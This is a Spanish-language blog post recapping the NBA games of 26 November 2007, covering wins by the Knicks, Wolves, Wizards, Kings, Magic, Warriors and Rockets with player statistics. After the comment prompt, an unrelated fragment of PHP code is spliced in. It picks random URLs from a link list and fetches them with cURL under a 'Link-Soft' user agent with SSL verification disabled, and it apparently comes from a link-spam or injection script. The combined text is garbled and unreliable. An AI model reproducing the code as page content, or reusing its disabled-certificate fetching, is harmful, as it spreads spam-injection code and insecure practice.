La crónica (26/11/07)

27 de November de 2007 por MagicJohnson32

Sorpresa, sorpresa. Knicks, Wolves, Wizards y Kings vencieron a Jazz, Hornets, Mavs y Spurs respectivamente la pasada madrugada, partidos en los que destacaron el sensacional momento de forma de Caron Butler, la motivación extra de Marko Jaric o la dulce venganza de Beno Udrih. Por último, contrastaron los bajos tanteos en Portland y Los Angeles con el espectacular Suns-Warriors.

Vamos con la crónica de los partidos disputados anoche:

Jazz 109 – 113 Knicks

Tal vez Marbury no es tan malo como Isiah pensaba. El base anotó 28 puntos con 9 de 14 en tiros y repartió 6 asistencias para dirigir, junto a los 25-14 de Randolph y los 22 de Crawford, el triunfo de los Knicks sobre los Jazz, que vieron cómo se acababa una racha de tres victorias seguidas. Por los de Salt Lake City volvió a funcionar a pleno rendimiento la pareja Boozer & Deron (30-12 del primero, 26-5-8 del segundo, ambos con grandísimos porcentajes) pero Kirilenko y Okur estuvieron muy por debajo de lo que pueden ofrecer y sólo Millsap y Brewer rindieron.

Wolves 103 – 94 Hornets

Segunda sorpresa de la noche. Los Wolves se anotaron su segundo triunfo de lo que va de temporada ante unos Hornets que, con 10 triunfos, se encontraban entre los mejores del Oeste. Y si sorprendente fue el triunfo de Minnesota, más sorprendente aún fueron los jugadores que lideraron la victoria: Marko Jaric, autor de 21 puntos y 6 asistencias, y Sebastian Telfair, que hizo 20-8-3. Jefferson se quedó en 14-4, Walker añadió 17-5 y Craig Smith logró 10 para superar a unos Hornets en los que Chris Paul fue el mejor (31-11 del base). La diferencia de acierto, un 52% de los Wolves por un 42% de los Hornets, resultó demasiada losa. Antoine Walker desveló la clave del partido a la finalización del mismo: Marko Jaric, que con éste lleva ya dos partidos seguidos de 20 o más puntos, está saliendo con la top model Adriana Lima.

Wizards 110 – 98 Mavs

Sigamos con las sorpresas. En este caso, el triunfo de los Wizards (sin Arenas, ya saben) en pista de los Mavericks. La estrella de la noche fue, de nuevo, Caron Butler, autor de 35 puntos con 8 de 12 en tiros de 2, 5 de 5 en triples, 4 de 4 en libres, más 8 rebotes. Su escudero fue el de siempre, Jamison, que hizo 27-6; y pese a que sólo Stevenson y Daniels les acompañaron con más de 10 puntos, los Wizards pudieron controlar el ataque de los Mavs, que no llegó al 40% en tiros de campo. Sólo Nowitzki brilló con 31 puntos, 8 rebotes y 6 asistencias en lo que supone la tercera derrota seguida de Dallas, aunque es la primera como local de la temporada.

udrihshoutSpurs 99 – 112 Kings

“La venganza de Udrih”, se podría titular. El base esloveno, cortado por los Spurs y repescado por los Kings para suplir la ausencia de Bibby, vengó anoche tantos y tantos partidos defenestrado en lo más profundo de la rotación de Popovich. 27 puntos (8 de 12 en tiros de campo, 9 de 9 en libres) más 4 rebotes y 5 asistencias en 40 minutos obtuvo Udrih, que lideró la victoria de los Kings sobre San Antonio. Pero el base no estuvo solo: 20-6-4 de Artest, 17-10-7-2-2 de Brad Miller, 17 (con 8 de 9 en tiros) de Moore más 12 de Salmons y 10 de Kevin Martin. Sacramento anotó por encima del 55% de acierto, algo impropio de un rival de los Spurs. Los texanos estuvieron desconocidos en ataque también: ninguna de sus estrellas logró más de 15 puntos y, en todo caso, cabría salvar a Oberto, autor de 13 y 6 rebotes con 6 de 7 en tiros. La de anoche fue la tercera derrota de los Spurs en toda la temporada. Y Udrih será hoy el hombre más feliz del mundo.

Magic 85 – 74 Blazers

En el partido que disputaron Orlando y Portland en el Rose Garden la sorpresa fue el bajo tanteo. El resultado final, triunfo para los Magic, resultó mucho más previsible. Ante el mal día anotador de Dwight Howard, quien además tuvo problemas de faltas, Turkoglu y Rashard Lewis se encargaron del ataque con 21 y 20 puntos respectivamente. Pero lo que dio el triunfo a los Magic fue la defensa: 42 puntos lograron los Blazers entre el segundo, tercer y cuarto periodo. Por los de Oregon destacaron Aldridge, con 16 puntos y 5 rebotes, y Webster, con 13-8. Sergio dispuso de 12 minutos, en los que logró 5 puntos, 3 rebotes y 1 asistencia.

Suns 114 – 129 Warriors

Nueva orgía anotadora entre Warriors y Suns, que acumularon 243 puntos en lo que supuso la prueba definitiva de que el equipo de Don Nelson ha arrancado tras su desastroso inicio. Después de sumar 4 victorias en los cinco partidos disputados la pasada semana, los Warriors demostraron cualquier cosa menos cansancio en el arranque del partido ante Phoenix, que encajó 45 puntos en el primer cuarto. Los de Oackland, que jugaron casi todo el partido sin 5, mantuvieron el ritmo y se impusieron en todos los cuartos para una victoria liderada por Stephen Jackson (32-8), Monta Ellis (31-3-4) y Baron Davis (28-6-10). Nash, con 23-13 pero 8 pérdidas fue el mejor en la tercera derrota en lo que va de temporada de los Suns.

Rockets 88 – 71 Clippers

¡Ah, qué diferente es la vida en Houston desde que se fue Van Gundy y llegó Adelman! ¿Sí? No, más bien todo lo contrario. Los Rockets volvieron a exhibir su juego eminentemente defensivo que les mantiene como el mejor de la liga en este apartado tras los Celtics, y una pobreza de recursos ofensivos que se limita a darle balones a los buenos para que improvisen. Es decir, lo que ya hacían con Van Gundy. Anoche el héroe volvió a ser McGrady, autor de 36 puntos, 14 de ellos durante un parcial de 22-5 al inicio del último periodo que hundió a los Clippers. La mejor ayuda para T-Mac no vino esta vez de Yao, discreto con 14-8, sino de Alston, que logró 17 puntos, 9 asistencias y 5 rebotes con buenos porcentajes y una sola pérdida de balón. Para los Clippers, entre Kaman, Maggette y Tim Thomas lograron 58 de los 71 puntos de su equipo, que firmó un 33% de acierto en tiros y se vio superado en el rebote pese a los 13 atrapados por Kaman.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>